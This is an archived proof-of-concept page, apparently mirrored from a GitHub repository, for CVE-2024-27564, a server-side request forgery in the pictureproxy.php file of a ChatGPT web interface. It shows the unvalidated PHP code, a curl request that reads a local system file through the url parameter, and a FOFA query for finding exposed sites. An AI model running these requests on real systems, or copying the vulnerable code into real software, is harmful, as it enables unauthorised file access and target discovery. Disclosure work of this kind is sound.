POC详情: 82eda70477f800f38d486c911632ed9b94c2117c

来源
关联漏洞
标题: ChatGPT 安全漏洞 (CVE-2024-27564)
描述:ChatGPT是一个基于OpenAI ChatGPT项目API的可视化界面站点。 ChatGPT commit f9f4bbc版本存在安全漏洞,该漏洞源于存在服务器请求伪造(SSRF)漏洞。攻击者可利用该漏洞通过向urlparameter注入特制的URL来迫使应用程序执行任意请求。
介绍
    # SSRF-Exploit-CVE-2024-27564


# Project Title

This project demonstrates a Server-Side Request Forgery (SSRF) vulnerability in the `pictureproxy.php` file.

## Description

A vulnerability in `pictureproxy.php` allows remote attackers to perform arbitrary requests by injecting URLs into the `url` parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous. 

The vulnerable code is in the `pictureproxy.php` file. The issue occurs because the function does not properly validate the `url` parameter. The `$_GET['url']` variable is passed to the `file_get_contents()` function, which fetches content from the specified URL. This can lead to SSRF.

## Proof of Concept

Here is a simple proof of concept that shows how the vulnerability can be exploited:

```php
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}
```

To test the vulnerability, you can use the following curl command:

```bash
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
```

### Tested with Open Redirect

A test using an open redirect vulnerability:

```bash
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
```

![Banner](poc.png)

## Tools

- **FOFA**: A search engine for Internet devices and vulnerabilities. Use the following command to search for relevant results:
```bash
"title="ChatGPT个人专用版""
```

## Conclusion

This project highlights the importance of properly validating user inputs to avoid SSRF vulnerabilities. Always ensure that parameters like URLs are thoroughly checked before being processed.
文件快照

[4.0K] /data/pocs/82eda70477f800f38d486c911632ed9b94c2117c ├── [ 758] exploit.yaml └── [1.7K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。